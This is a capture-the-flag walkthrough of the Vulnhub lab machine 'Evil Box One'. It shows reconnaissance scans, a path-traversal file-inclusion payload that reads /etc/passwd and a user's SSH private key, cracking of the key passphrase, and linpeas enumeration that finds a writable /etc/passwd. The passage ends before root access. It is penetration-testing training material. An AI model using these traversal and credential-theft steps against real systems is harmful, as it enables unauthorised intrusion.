Vulnhub Evil Box One walkthrough

Evil Box One

Identifying the target host IP address

┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16   |   Screen View: Unique Hosts        
                                                                            
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:0b:79:0e      2     120  PCS Systemtechnik GmbH   
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor           
 192.168.56.151  08:00:27:42:21:ce      1      60  PCS Systemtechnik GmbH

Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.151 (the MAC vendor "PCS Systemtechnik GmbH" is Oracle VirtualBox, which the Nmap scan below confirms).

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.151 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-05 07:20 EDT
Nmap scan report for bogon (192.168.56.151)
Host is up (0.000059s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:42:21:CE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds

Get Access

Browsing to port 80 on the target from Kali returns the Apache default page. robots.txt exists but only contains a greeting:

┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ curl http://192.168.56.151/robots.txt
Hello H4x0r

┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ nikto -h http://192.168.56.151     
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.151
+ Target Hostname:    192.168.56.151
+ Target Port:        80
+ Start Time:         2022-11-05 07:23:45 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c9a9bb4d712e, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2022-11-05 07:24:34 (GMT-4) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n


Nikto found a /secret/ directory. Confirm it with directory brute-forcing:

┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ gobuster dir -u http://192.168.56.151 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.151
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/05 07:25:42 Starting gobuster in directory enumeration mode
===============================================================
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.151/secret/]                                                                       
/server-status        (Status: 403) [Size: 279]
Progress: 205002 / 207644 (98.73%)
===============================================================
2022/11/05 07:26:06 Finished
===============================================================
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ dirb http://192.168.56.151    

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Nov  5 07:26:17 2022
URL_BASE: http://192.168.56.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.151/ ----
+ http://192.168.56.151/index.html (CODE:200|SIZE:10701)
+ http://192.168.56.151/robots.txt (CODE:200|SIZE:12)                       
==> DIRECTORY: http://192.168.56.151/secret/
+ http://192.168.56.151/server-status (CODE:403|SIZE:279)                   
                                                                            
---- Entering directory: http://192.168.56.151/secret/ ----
+ http://192.168.56.151/secret/index.html (CODE:200|SIZE:4)
                                                                               
-----------------
END_TIME: Sat Nov  5 07:26:20 2022
DOWNLOADED: 9224 - FOUND: 4

Requesting /secret/ returns effectively nothing (its index.html is only 4 bytes):

┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ curl http://192.168.56.151/secret/   

Check whether the directory holds any files, this time brute-forcing with common extensions added:

┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ gobuster dir -u http://192.168.56.151/secret/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.151/secret/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              html,php,txt,sh
[+] Timeout:                 10s
===============================================================
2022/11/05 07:27:54 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 4]
/.html                (Status: 403) [Size: 279]
/evil.php             (Status: 200) [Size: 0]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
Progress: 1036244 / 1038220 (99.81%)
===============================================================
2022/11/05 07:30:02 Finished
===============================================================

The /secret/ directory contains evil.php.

┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ curl http://192.168.56.151/secret/evil.php
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ 

Requesting the file also returns an empty body, so the next step is to enumerate its parameter name. wfuzz is pointed at a directory-traversal payload for /etc/passwd, and `--hw 0` hides every response with zero words, i.e. the empty body evil.php returns whenever the parameter name is wrong:

┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ wfuzz -c -u http://192.168.56.151/secret/evil.php?FUZZ=../../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/common.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.151/secret/evil.php?FUZZ=../../../../../../etc/passwd
Total requests: 4713

=====================================================================
ID           Response   Lines    Word       Chars       Payload     
=====================================================================

000001163:   200        26 L     38 W       1398 Ch     "command"   

Total time: 2.793259
Processed Requests: 4713
Filtered Requests: 4712
Requests/sec.: 1687.276

The parameter name has been fuzzed out: command. Confirm it manually:

┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ curl http://192.168.56.151/secret/evil.php?command=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

The file shows one regular user, mowree. Trying to execute commands through the parameter does not appear to work: the script is a local file inclusion (LFI), not command execution. Use the same traversal to check whether /home/mowree/.ssh/id_rsa exists and is readable by the web server user:

┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ curl http://192.168.56.151/secret/evil.php?command=../../../../../../../home/mowree/.ssh/id_rsa > id_rsa
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--
100  1743  100  1743    0     0   455k      0 --:--:-- --:--:-- --:--:--  567k
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ ls
id_rsa  nmap_full_scan
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ cat id_rsa                             
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
[encrypted key body omitted]
-----END RSA PRIVATE KEY-----
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ 

Log in to the target with the recovered private key (the `Proc-Type: 4,ENCRYPTED` / `DEK-Info` headers already indicate it is passphrase-protected):

┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ chmod 400 id_rsa 
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ ssh -i id_rsa mowree@192.168.56.151                        
The authenticity of host '192.168.56.151 (192.168.56.151)' can't be established.
ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.151' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa': 


The private key is passphrase-protected, so the passphrase has to be cracked:

┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ ssh2john id_rsa > hashes           
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ john hashes /usr/share/wordlists/rockyou.txt                 
Warning: only loading hashes of type "SSH", but also saw type "tripcode"

Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
unicorn          (id_rsa)     
1g 0:00:00:00 DONE 2/3 (2022-11-05 07:45) 12.50g/s 159175p/s 159175c/s 159175C/s surfer..unicorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 


The passphrase is cracked: unicorn. Note that the invocation above passes rockyou.txt as a second hash file rather than as a wordlist (hence the warning about also seeing type "tripcode"); john therefore fell back to its default single-crack and wordlist modes (/usr/share/john/password.lst) and still found it. The intended form is `john --wordlist=/usr/share/wordlists/rockyou.txt hashes`.

┌──(kali㉿kali)-[~/Vulnhub/Evil_box]
└─$ ssh -i id_rsa mowree@192.168.56.151         
Enter passphrase for key 'id_rsa': 
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:~$ uname -a
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
mowree@EvilBoxOne:~$ cat /etc/*release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

Privilege escalation

Upload linpeas.sh to /tmp on the target (served over HTTP from the Kali box at 192.168.56.137:8000) and make it executable:

mowree@EvilBoxOne:~$ cd /tmp
mowree@EvilBoxOne:/tmp$ wget http://192.168.56.137:8000/linpeas.sh
--2022-11-05 12:50:27--  http://192.168.56.137:8000/linpeas.sh
Conectando con 192.168.56.137:8000... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 827827 (808K) [text/x-sh]
Grabando a: “linpeas.sh”

linpeas.sh          100%[================>] 808,42K  --.-KB/s    en 0,004s  

2022-11-05 12:50:27 (205 MB/s) - “linpeas.sh” guardado [827827/827827]

mowree@EvilBoxOne:/tmp$ ls
linpeas.sh
systemd-private-c6630f91b987414f87c9ea06b994a7ad-apache2.service-OIZiOj
systemd-private-c6630f91b987414f87c9ea06b994a7ad-systemd-timesyncd.service-3sxhUM
mowree@EvilBoxOne:/tmp$ chmod +x linpeas.sh
mowree@EvilBoxOne:/tmp$ ./linpeas.sh


                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------------\                                                                   
    |                             Do you like PEASS?                                  |                                                                   
    |---------------------------------------------------------------------------------|                                                                   
    |         Get the latest version    :     https://github.com/sponsors/carlospolop |                                                                   
    |         Follow on Twitter         :     @carlospolopm                           |                                                                   
    |         Respect on HTB            :     SirBroccoli                             |                                                                   
    |---------------------------------------------------------------------------------|                                                                   
    |                                 Thank you!                                      |                                                                   
    \---------------------------------------------------------------------------------/                                                                   
          linpeas-ng by carlospolop                                          
                                                                             
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.                          
                                                                             
                          
                                            


                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════                                                                       
                               ╚═══════════════════╝                         
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users     
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

╔══════════╣ Do I have PGP keys?
gpg Not Found                                                                
netpgpkeys Not Found                                                         
netpgp Not Found                                                             
                                                                             
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                          
                                                                             
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens                                                                    
ptrace protection is disabled (0)                                            
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2                                                
                                                                             
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                              

╔══════════╣ Users with console
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash                          
root:x:0:0:root:/root:/bin/bash


                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════                                                                        
                             ╚══════════════════════╝                        
╔══════════╣ Useful software
/usr/bin/base64                                                              
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/wget

╔══════════╣ Installed Compilers
                                                                             
╔══════════╣ Searching mysql credentials and exec
                                                                             
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.38 (Debian)                       
Server built:   2021-06-10T10:13:06
httpd Not Found
                                                                             
Nginx version: nginx Not Found
                               ╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════                                                                       
                               ╚═══════════════════╝                         
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                          
strings Not Found                                                            
strace Not Found                                                             
-rwsr-xr-x 1 root root 427K ene 31  2020 /usr/lib/openssh/ssh-keysign        
-rwsr-xr-x 1 root root 10K mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 50K jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper                                                                 
-rwsr-xr-x 1 root root 51K ene 10  2019 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                               
-rwsr-xr-x 1 root root 44K jul 27  2018 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 63K jul 27  2018 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)    
-rwsr-xr-x 1 root root 35K ene 10  2019 /usr/bin/umount  --->  BSD/Linux(08-1996)                                                                         
-rwsr-xr-x 1 root root 53K jul 27  2018 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K jul 27  2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 83K jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K ene 10  2019 /usr/bin/su

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                          
-rwxr-sr-x 1 root shadow 39K feb 14  2019 /usr/sbin/unix_chkpwd              
-rwxr-sr-x 1 root tty 15K may  4  2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 19K dic  3  2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 71K jul 27  2018 /usr/bin/chage
-rwxr-sr-x 1 root shadow 31K jul 27  2018 /usr/bin/expiry
-rwxr-sr-x 1 root tty 35K ene 10  2019 /usr/bin/wall
-rwxr-sr-x 1 root crontab 43K oct 11  2019 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 315K ene 31  2020 /usr/bin/ssh-agent

                                                
                                                                             
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable            
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No                                 
═╣ Can I read shadow plists? ............ No                                 
═╣ Can I write shadow plists? ........... No                                 
═╣ Can I read opasswd file? ............. No                                 
═╣ Can I write in network-scripts? ...... No                                 
═╣ Can I read root folder? .............. No                                 
                                                                             
╔══════════╣ Searching root files in home dirs (limit 30)
/home/                                                                       
/home/mowree/.bash_history
/root/
/var/www
/var/www/html
/var/www/html/robots.txt
/var/www/html/index.html
/var/www/html/secret
/var/www/html/secret/index.html
/var/www/html/secret/evil.php

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)                                                                      
/sys/fs/cgroup/systemd/user.slice/user-1000.slice/user@1000.service          
/sys/fs/cgroup/unified/user.slice/user-1000.slice/user@1000.service

╔══════════╣ Readable files belonging to root and readable by me but not world readable                                                                   
                                                                             
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/auth.log                                                            
/var/log/daemon.log
/var/log/syslog
/var/log/wtmp
/var/log/lastlog

╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation                                                                 
logrotate 3.14.0                                                             

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes

╔══════════╣ Files inside /home/mowree (limit 20)
total 32                                                                     
drwxr-xr-x 4 mowree mowree 4096 ago 16  2021 .
drwxr-xr-x 3 root   root   4096 ago 16  2021 ..
lrwxrwxrwx 1 root   root      9 ago 16  2021 .bash_history -> /dev/null
-rwxr-xr-x 1 mowree mowree  220 ago 16  2021 .bash_logout
-rwxr-xr-x 1 mowree mowree 3526 ago 16  2021 .bashrc
drwxr-xr-x 3 mowree mowree 4096 ago 16  2021 .local
-rwxr-xr-x 1 mowree mowree  807 ago 16  2021 .profile
drwxr-xr-x 2 mowree mowree 4096 ago 16  2021 .ssh
-r-------- 1 mowree mowree   31 ago 16  2021 user.txt

╔══════════╣ Files inside others home (limit 20)
/var/www/html/robots.txt                                                     
/var/www/html/index.html
/var/www/html/secret/index.html
/var/www/html/secret/evil.php

╔══════════╣ Searching installed mail applications
                                                                             
╔══════════╣ Mails (limit 50)
                                                                             
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 7867 jul 16  1996 /usr/share/doc/telnet/README.old.gz 
-rw-r--r-- 1 root root 303 oct 26  2018 /usr/share/doc/hdparm/changelog.old.gz
-rw-r--r-- 1 root root 363752 abr 30  2018 /usr/share/doc/manpages/Changes.old.gz                                                                         
-rw-r--r-- 1 root root 9731 jul 18  2021 /usr/lib/modules/4.19.0-17-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9716 ene 30  2021 /usr/lib/modules/4.19.0-14-amd64/kernel/drivers/net/team/team_mode_activebackup.ko


╔══════════╣ Web files?(output limit)
/var/www/:                                                                   
total 12K
drwxr-xr-x  3 root root 4,0K ago 16  2021 .
drwxr-xr-x 12 root root 4,0K ago 16  2021 ..
drwxr-xr-x  3 root root 4,0K ago 16  2021 html

/var/www/html:
total 28K
drwxr-xr-x 3 root root 4,0K ago 16  2021 .
drwxr-xr-x 3 root root 4,0K ago 16  2021 ..

╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)                                                          
-rw-r--r-- 1 root root 0 nov  5 11:53 /run/network/.ifstate.lock             
-rwxr-xr-x 1 mowree mowree 220 ago 16  2021 /home/mowree/.bash_logout
-rw-r--r-- 1 root root 220 abr 18  2019 /etc/skel/.bash_logout
-rw------- 1 root root 0 ago 16  2021 /etc/.pwd.lock
-rw-r--r-- 1 root root 0 nov 15  2018 /usr/share/dictionaries-common/site-elisp/.nosearch
-rw-r--r-- 1 root root 22 mar 21  2019 /usr/share/debian-reference/.htaccess

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)                     
-rwxr-xr-x 1 mowree mowree 827827 nov  5 12:50 /tmp/linpeas.sh               
-rw-r--r-- 1 root root 9359 ago 16  2021 /var/backups/apt.extended_states.0

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)                                                       
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                         
/dev/mqueue                                                                  
/dev/shm
/etc/passwd
/home/mowree
/run/lock
/run/user/1000
/run/user/1000/systemd
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/.Test-unix
/tmp/.X11-unix
#)You_can_write_even_more_files_inside_last_directory

/var/lib/php/sessions
/var/tmp

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                         
                                                                             
╔══════════╣ Searching passwords in history files
                                                                             
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password                                                   
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/systemd/systemd-reply-password
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-wall.path
/usr/lib/systemd/system/systemd-ask-password-wall.service
  #)There are more creds/passwds files in the previous parent folder

/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man7/credentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password


                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════                                                                        
                                ╚════════════════╝                           
Regexes to search for API keys aren't activated, use param '-r' 


The linpeas.sh output shows that /etc/passwd has wrong permissions ("Writable passwd file? ... /etc/passwd is writable"):

mowree@EvilBoxOne:/tmp$ 
mowree@EvilBoxOne:/tmp$ ls -alh /etc/passwd
